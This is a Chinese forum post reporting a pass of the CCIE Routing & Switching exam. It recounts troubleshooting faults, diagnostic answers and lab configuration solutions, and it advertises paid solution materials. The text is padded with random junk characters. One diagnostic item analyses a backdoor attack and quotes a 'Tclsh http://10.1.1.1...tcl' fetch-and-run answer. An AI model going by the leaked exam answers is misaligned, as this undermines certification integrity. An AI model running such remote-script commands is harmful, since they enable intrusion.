- 积分
- 154
- 鸿鹄币
- 个
- 好评度
- 点
- 精华
- 最后登录
- 1970-1-1
- 阅读权限
- 20
- 听众
- 收听
助理工程师
|
恭喜「冰风」同志拿到CCIE证书,以下战报分享,希望能帮助大家。祝愿大家都能拿到CCIE号码。
+ [; c$ v3 b; ~0 X) Y4 K! d. f+ {+ K, z) q! A) U' }
" k6 i6 p! T; o Z" j( q G; q/ FTS1 DIAG3++ H2+! e1 e2 f6 Y2 J3 b1 P
/ {' S# c0 m' |. y% Q
先说说总体感觉:9 f5 A* }7 ^! g' `# O, t
这次北京只有3个人考试,1个无线,2个RS,我如愿抽到了H2+,另外一个人我提前15分钟交卷时,他还在做,图是H2的图,估计是H2+。所以抽到H2+的几率很大,准备后面考试的兄弟姐妹还是做好H2+的充分准备再上场。* D6 }0 x1 F' v! _! j, @
TS1比较简单,尤其是前面几题,错点很少。考前挺担心TS的,尤其是第一题,可以出的错点其实非常多,3月有个朋友网络经验很足,第一题排了半个多小时,整个TS花了两个半小时,那时候lab没出变种,对lab影响不大。现在抽到变种的几率很大,如果TS花的时间太长,对lab影响就很大了。而且TS节省的时间,可以全部加到lab上,也就是说lab时间是可以超过5个半小时。我是提前半小时结束TS,从10点开始做lab,一直到3点45都没提示我交卷,也没有倒计时。& p2 I; m) A$ y# a) I. P1 z$ }; i: T
诊断比较幸运的是,考前2天看战报才了解到有DIAG3++, 备考的诊断资料里都没有提到,幸亏当时记了一下答案。所以考前2天多看战报是很重要的,要是挂在诊断上,岂不是太冤了。
7 y4 I/ u* l- ?2 V7 z4 Slab抽到H2+, 心情有点小复杂。考前我是带有检验H2+解法的任务来到北京的,前面用我们解法去考H2+的两个兄弟都挂了,大家对解法都不是很有信心。所以做完诊断,还是挺期待抽到H2+的,一方面前面半个月一直在准备变种,另一方面TS和诊断还比较顺利,节约了不少时间给lab。这次能顺利通过,得特别感谢新认识的群友小刘,是他考前2天把我拉到一个新群,让我了解到一个重要的解法:后门用路由拆分(BGP Deaggregate)来实现;和一个重要的新需求:R55/R56不能下放172.0.0.0/8路由到PE,还有其它一些考点的解法讨论,包括如何实现负载等等,让我受益匪浅。" h1 y# @, w/ F# C
「欢迎大家关注微信公众号『CCIE战报』,最新最全的战报我会即时更新。」, ^$ C5 q+ ^5 l' d! h
「大家想看历史战报可以点击战报-历史目录,战报都是大家血与泪走过来的,希望能帮助大家。」
3 m3 ]+ `" K6 T, n4 h. t$ T0 f1 W「题主整理了H2+的所有需求和解法以及预配IOU,挂出售卖,希望能给大家节省时间,也能减轻我经济负担。」
6 o5 p( K/ M+ T( p1 r「大家不想花钱或者不信任题主的,可以私聊题主,将更新前整理的资料分享给你,虽有偏差,但也能覆盖百分之八十,你在酌情考虑。」9 \7 h4 V; V1 v9 K+ ]& X: ~
「最后,这个战报很详细,大家好好观看,先匿了,祝你顺风。」
4 k& I: S) |4 C% Z" Z- I1 TTS1:
0 ?5 J/ z4 b3 B1)两个交换机vlan12是down的,添加vlan12后出现象;; N0 j/ f2 w; Y* P; |
2)PPP常规错点,删掉R17的ppp auth chap callout,添加ppp ipcp route default,把用户名和密码重新刷一遍后出现象;
w$ I6 W' O- Y4 ] k8 i) g8 Q3)OSPF,R21的e2/0有cost,删掉,R3有两条123.5.5.5的静态(应该影响到是mpls那题),删掉;+ u6 h# G0 T. D7 Q- y
4)eigrp,R13有个接口有delay,删掉,验证现象时图上的metric是1703,所以还要把4个路由器的eigrp都刷上metric weight 0 1 1 1 1 1;2 S: G) U- |& F2 y
5)BGP,极其简单,R12添加max-path 2出现象,可能R22还有个下一跳问题,记不清了,反正错点很少;3 {- `4 ~! z' G& [0 ?# c
6)DMVPN,常规错点,把4个tunnel的配置对一遍,然后ping R19不通,查看R19的s4/0有acl控制,加一条permit ip any any(应该还有更精细的加法)。加密也有个小错,记不清了。R15还要添加no ip split eigrp 200和no ip next-hop-self eigrp 200。2 A8 P: g" S! b; L8 O
7)ipv6,常规错点,R22的route-map下一跳错,R25没有宣告XX:XX:XX:25::/64( d' M, I; x* C- B& o0 l7 M8 w6 Y& |
8)MPLS,错点稍多,R8的接口漏配nat,R3,R4,R5,R6的RT错,R3的125网段没有宣告,R4/R6的标签断裂问题等,虽然稍多,但都是我们平时练习到的。按照思路逐步排查,不难。
& N) {. d7 B7 f6 X) }9)DMVPN+NAT, R23貌似nat有个小错,因为开始R24 ping R7的外网口不通,排查后通了。检查R24和R7的tunnel配置,把两端的加密去掉后,出ospf邻居成功建立的信息,说明加密有问题,R7的第一阶段加密没有配group,加上后ok;
# H! N; d/ T4 U0 K& z9 V# V( w- _( C10)NAT+DNS, R23的DHCP mac地址配错. ]. M5 @5 C% x$ P
总体TS还是算简单的,第6第8是4个point的分值,其它都是2个point,多花点时间在这2题上。
$ O6 x& ~1 w8 }" W, q- @) p7 B4 L4 [8 b7 i' `
DIAG3++:
" C" L$ G- P5 W$ E/ m. p( O5 `DHCP snooping
2 g( g9 R) l: }6 f+ h% U9 K* @q1 抓包 看了一下 找DHCP包 源是0.0.0.0 选114
; n/ \* R6 j1 y; C. u. a& Kq2 单选题 选 sourse ip add is 0.0.0.01 T d& s( s* ]: L
q3 sw1-sw34 f' n" t7 V( I4 y( H" u0 S4 G
黑客攻击:- W" t2 w& p. f( J5 h$ Z" m
抓包信息看tcp三次握手信息,判断10.1.1.2是受害者,10.1.1.1是黑客) ?( J( I4 y) u0 g% r
q1:8选4
4 B0 x2 o# s! j- r2 S; i1)TCP connection to 10.1.1.1' S5 Z4 e$ H) x5 g V/ O& n
2)script downloaded from 10.1.1.1 6 b- x( l- o# s4 v( n" g9 e
3)hacker from a remote host to 10.1.1.2 on port 1337
" |# p# c( [* Q: [4)ransomware installed by backdoor " h& T+ _: U: q' {) ?% j2 `
q2: sudo poweroff
0 d# x: T9 R" n+ r( R& M( yq3: Tclsh http://10.1.1.1.xx.tcl
: }# V: V* ~! l3 P9 t' P这题我有点小纠结,因为有个类似的选项:http://10.1.1.2.xx.tcl.
7 k; }+ E9 `; G W% W* q' b9 u9 v$ Z; N( x, [& x1 `
H2+:$ _( d9 W3 J/ k ]5 K
1)这里我要重点说一下L2的问题,考前一直听说考场H2+的L2存在大bug,多人碰到做完bund,vlan173,184会down,很多人是通过no掉spanning的一些配置来解决的,这样做的结果只能是fail,而且最后反映的L2的得分都很低。考前我对L2的问题也很犯悚,因为不知道为什么会这样,自己在模拟器一直没这种情况。幸亏考前我们在机构版本室再现了这个问题,SW3和SW5做完bund,直接出接口errdisable的信息,errdisable的原因是bgduguard。我们拉来机构老师一起分析,推测原因是:在定义channel-group的时候,在某些IOS版本里,portchannel35和portchannel46没有继承物理链路的中继配置(swi mode trunk),默认还是access,如果SW3和SW5不是相同的版本,就会出现一侧(SW3)是trunk, 一侧(SW5)是4 O8 @: o" }! g
access,这时bpduguard就会起作用了,SW3一发bpdu,SW5的接口就会errdisable,造成vlan173起不来的现象。8 e, p1 X6 _! `. r
解决办法:
( v: B6 e. j/ R) I0 @在SW3和SW5建portchannel时,两边都把物理接口shutdown,建好portchannel后,确认portchannel的配置是否和物理链路一致,都是trunk,如果portchannel里配置是空的,配上swi tr en do/swi mo tr,之后再把两边接口no shut。
0 [& f1 M+ T) H: Z% \% h0 @考场我就是这么做的,没有出任何问题,当然我也是步步小心,整个L2花了我40分钟时间。
& G- `; \% ^+ y, Y2)R17/R19/R20/R21的vrf解法,我就不说了,各机构都有,唯一区别的是有的机构解法里,没有配area 51 stub,理由是要传10.2.0.0/16汇总到area 51。其实配了area 51 stub,也能传,只是R17不能配成stub no-summary。另外提醒一下,配完tunnel以后,R19/R20/R20都把对方的路由前缀trace几次,确保只有1跳,不经过hub,路由表的相应前缀前会多一个%。
, v. s4 d" V( y3)OSPF的配置没什么说的,DC区域没有预配,不能用network,不能有2类LSA;其他几个65002区域,OSPF预配都有,只需要在SW1,SW2里passive掉vlan100(题目没要求,属于优化配置)
8 V' [2 Z% D9 m( `- q- C* R& o4)EIGRP要用64bit命名方式,要解决L052(bandwidth 1K)进路由表的问题,没有限制刷K值还是改rib-scale,推荐用rib-scale,因为用rib-scale=153,出来的metic和现象图里一模一样。
; p# i% k/ }' l# W. u5)BGP CE配置,R15/R16汇总10.0.0.0/8,并要下发默认到PE,我用的是network 0.0.0.0。重分布要注意,OSPF重分布到BGP时,用redistribute ospf 1就可以了,后面什么也别跟,他的作用就是在bgp里产生明细,使汇总生效就可以了。R11/R12/R13/R14和老版本一样。验证时要注意,现象图里的as号是65001 65002,不是原来的65001 65001。说明以前通过as-override的方式不行了,要在CE上配nei XXX allowas-in。& h% [3 g9 }2 `( V. `( K {
6)BGP PE配置,防环没限制方式,用SOO最简单4 b6 {: E& m$ {3 f, }. |4 `% q7 C# ~& x
7)R9和R10的防环,有一堆限制,用distance ospf ext 171可以实现( i+ b5 w% \# U5 X* ^
8)重点来了,R18和R57之间的后门,我仔细看了几遍需求,agg+summary only是明确的,但没有说只能放一条前缀到对端,理论上用反抑制列表和路由拆分都可以。推荐用路由拆分,防止需求理解错了。这里推荐做个优化:R18 BGP重分布到OSPF时,做个过滤,只放2个前缀过去:172.0.0.0/8和172.18.1.0/24;同理R57上BGP重分布到EIGRP时,只放2个前缀过去:10.0.0.0/8和10.2.100.0/24;我在配完所有配置,检查现象的时候,发现一个奇怪的问题,R18收到了R57回传的10.0.0.0/8,因为这条路由比不过R18汇总产生的10.0.0.0/8,也不影响现象,我因为时间有点紧张,就没有再做优化。建议有时间还是做个优化比较好。
- G; a# E: W$ l8 B. @9)R55/R56也是容易犯错的地方,单纯实现题目的需求不难,但要实现题目隐含的后门需求,还是要做一番优化的。首先要把10.0.0.0/8的路由过滤掉,不能回传给PE;其次172.0.0.0/8这条路由,要看需求,最早的变种只是要求不能在R55/R56做汇总,那时是可以放172.0.0.0/8到PE,并传给DC区域,这样在DC区域要做的优化是在R15/R16上改OSPF的重分布type为OE1,以达到DC区域优选R15/R16方向的172.0.0.0/8的目的;现在新的需求是,不允许把172.0.0.0/8传到PE,这样势必要把172.0.0.0/8这条路由也过滤掉,同时把172.0.0.0/8 le 32这段的明细都下放给PE,并传到DC区域,这样在DC区域要做的优化就变了,要在R18上改OSPF的重分布type为OE1,以达到DC区域访问172.18.1.0/24优选R18的后门链路;其他还有172.17.x.x的路由,经过双点双向重分布,也要防止回传给PE;过滤的方法有很多种,要理解它们的不同点,比如可以在eigrp重分布到bgp的时候过滤,也可以在nei PE后面加过滤,但对这个场景,必须在重分布的时候过滤,我这里不说原因,备考的同学自己要想明白为什么,我说一下在nei PE后门加过滤的现象:SW10的10.0.0.0/8路由,刚开始是优选R55/R56方向(这是正确的方向),过段时间就会变成优选R57方向。SW10重启SVI口后,会短暂恢复到优选R55/R56方向,之后还是会回到R57方向。8 `' D$ x# k7 c( K; S: o
关于SW10的10.0.0.0/8路由,要实现优选R55/R56方向,最简单的方法是R57重分布的时候设置的K值,与R55/R56重分布的时候设置的K值,完全一样。因为SW10与R55/R56之间是SVI接口,和R57之间是eth口,SVI接口本身就比eth口的delay小,在K值设置相同的情况下,自然就会优选R55/R56方向。# q: r9 v, P K$ j
10)做完以上配置,路由互通就差不多完成了,接着就是验证路由是否与现象图完全一致:
. H2 b0 g- Y1 H( l; h& m `7 U) ?* p( Oa. R101 trace 172.18.1.254
) ?3 _( q3 B! P u==>走后门2 L8 g0 A, k1 ?
b. R101 trace 172.18.2.254
% V" m( @ ~% M==>走MPLS区域3 u; c8 t' D, R: d% B
c. SW10带源trace 10.2.100.100
& ~5 J0 X' G7 T; q# ^8 [" t==>走后门
% h D' v4 y' b# n7 Yd. SW10 trace 10.2.101.253% }; V8 C4 D! `$ W0 W p% u7 V
==>走MPLS区域,全负载,但只走R3,不走R4(意味着不需要在R50/R51配maxpath ibgp 2)。如果碰到第3跳开始不负载,有两个方法解决:一个是在R50/R51的e0/0配:ip load-share per-packet;还有一个是在R50/R51的e0/1上配:no ip route-cache cef;两个方法任选一个都行。如果配了这两条还不负载,不要怀疑方法,一定是路由有问题。我考场就碰到了,当时立马有点头晕,冷静下来考虑是不是有条路本身就不通,看trace的路径,走的是R10,把R10的e0/1断开再trace,果然不通了。因为考场有预配mpls,我就没配,检查了几台设备的mpls配置,觉得很花时间,索性把所有设备的mpls重新刷了一遍。刷完就通了,负载现象也出来了。强烈推荐mpls即使有预配也全部重新刷一遍。
6 U0 Y7 g6 @8 r6 R2 Y. m$ c5 de. SW1/SW2 trace 10.2.100.100
/ [# X7 O' o5 \/ z B6 H==>走mpls区域,全负载,一条路径走R3,一条路径走R4,不需要做任何配置,这个选路是BGP选路原则第8条起作用,所以配maxpath是不起作用的。不负载一定是BGP配的有问题。
& C" n6 S3 R/ V& U11)最后验证后门切换,R18上断开e0/0接口,把上面的a,b,c,d再跑一遍。都要能跑通,走MPLS。我在平时练的时候,这个切换要花2分钟以上,丢十几个包后才通。考场不知道为什么,切换极快,丢几个包就通了。没有时间细究到底什么原因。反倒是切换回来挺花时间的,好像路由拆分要花一段时间路由明细才出来。
+ c) H- h9 j! W, Z. k& q1 F, z4 [1 M12)组播要注意一点,因为题目要求R19带source e0/1 ping组播地址,这时候R19就不是源了,而是最后一跳路由器,所以所有的组播配置都要在R19上配。这和H2不同,H2是明确要求SW3没有任何组播配置,但能ping通组播地址,这是因为SW3没有带source ping。
/ g1 d5 {$ |" l* S6 B P, Z7 c/ o+ b7 Y13)其他的ipv6和feature就没什么说的了,有些需求的小变化,解起来不难。
7 p1 h+ _$ m( \+ b* S14)最后提一点,我在平时练习的时候就发现,只要同时配了HSRPv6和DHCP snooping,R101就ping不出去了(地址还是能拿到),SW3同时也会变的很不稳定。我在考场的时候也担心出现这个问题,所以我一直没配DHCP snooping,把所有配置都验证完以后,才配的DHCP snooping,结果果然拿到地址后ping 8.8.8.8就开始丢包了,5个包丢了3个。接着SW3就出现TRC=XX这类平时我们认为模拟器挂了的信息。看来正如题目要求的,需要解决广播风暴的问题。这个好像我还没看到有好的解决方案,只在SW6上的e1/0上配了一条ip dhcp snooping limit rate 10,但显然没起什么作用。幸好SW3 reload以后,所有路由都恢复了,还顺便验证了一把track的配置。此时还剩半个小时,赶紧花了十几分钟用SW4和所有站点都验证了一遍路由,没问题就赶紧交卷了。) R; @* d |" U% Y. I' G: n5 R: P2 F
2 _# d6 T. e# ]- Q; E
这次能顺利通过,需要感谢的人很多,机构的老师,一起备考的同学,各位无私分享的群友,等等,还要感谢考官,没怎么tr我,貌似就是shut down了我几个接口,还让我们提前10分钟进入考场进行考试。所以建议备考的同学当天最好提前半小时到场,能提前考试总是有帮助的。1 [8 Z: f0 N: f1 f- y8 H
6 n# a$ |, q) \" F0 F+ t2 x
3 E+ Z* p, X1 n( G% s
0 c* u% O( Y6 w) N
: y" B" ^2 w" S4 s" H8 L4 o } I |
|
简体中文
英语
日语
韩语
法语
西班牙语
越南语
泰语
阿拉伯语
俄语
葡萄牙语
德语
意大利语
希腊语
荷兰语
波兰语
保加利亚语
爱沙尼亚语
丹麦语
芬兰语
捷克语
罗马尼亚语
斯洛文尼亚语
瑞典语
匈牙利语
繁体中文
文言文
发表于 2017-5-7 11:09:39
置顶卡
喧嚣卡
变色卡
千斤顶
